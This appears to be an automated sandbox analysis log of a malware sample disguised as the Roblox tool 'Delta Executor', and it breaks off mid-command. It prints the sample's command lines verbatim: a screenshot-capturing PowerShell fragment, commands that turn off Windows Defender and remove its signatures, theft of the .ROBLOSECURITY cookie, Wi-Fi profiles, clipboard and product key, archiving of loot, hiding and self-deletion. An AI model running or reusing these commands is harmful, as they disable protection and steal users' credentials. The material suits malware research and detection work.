YwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0g41aygj\0g41aygj.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E6D.tmp" "c:\Users\Admin\AppData\Local\Temp\0g41aygj\CSC3E40BF86C7A44E7B9E4B713195BCF90.TMP"7⤵
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4448"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 44485⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4448"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 44485⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 540"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 5405⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 540"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 5405⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1676"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16765⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1676"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16765⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2872"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28725⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2872"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 28725⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1780"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17805⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1780"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 17805⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1588"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 15885⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1588"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 15885⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2476"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24765⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2476"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24765⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1956"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19565⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1956"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 19565⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4572"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45725⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4572"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 45725⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵
-
C:\Windows\system32\getmac.exegetmac5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48722\rar.exe a -r -hp"Kizaki123" "C:\Users\Admin\AppData\Local\Temp\qJT36.zip" *"4⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI48722\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI48722\rar.exe a -r -hp"Kizaki123" "C:\Users\Admin\AppData\Local\Temp\qJT36.zip" *5⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Downloads\Delta Executor.exe""4⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost -n 35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x308 0x2cc1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffef1cccc40,0x7ffef1cccc4c,0x7ffef1cccc582⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2368,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=2364 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1720,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=2400 /prefetch:32⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1984,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=2504 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=3156 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=3196 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4644,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=4664 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4940,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=4796 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4920,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=5144 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5096,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=4956 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5260,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=5208 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4764,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=4696 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4948,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=3212 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5452,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=5604 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5620,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=5752 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5628,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=5792 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5636,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=6052 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5740,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=6080 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3216,i,3899521611103206091,16845596238358660156,262144 --variations-seed-version=20250122-180204.562000 --mojo-platform-channel-handle=6188 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\Delta Executor.exe"C:\Users\Admin\Downloads\Delta Executor.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Downloads\Delta Executor.exe"C:\Users\Admin\Downloads\Delta Executor.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Delta Executor.exe'"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Delta Executor.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please re execute the file!', 0, 'Delta Executor', 0+16);close()""4⤵
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please re execute the file!', 0, 'Delta Executor', 0+16);close()"5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Delta Executor.exe""4⤵
- Hide Artifacts: Hidden Files and Directories
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\Downloads\Delta Executor.exe"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 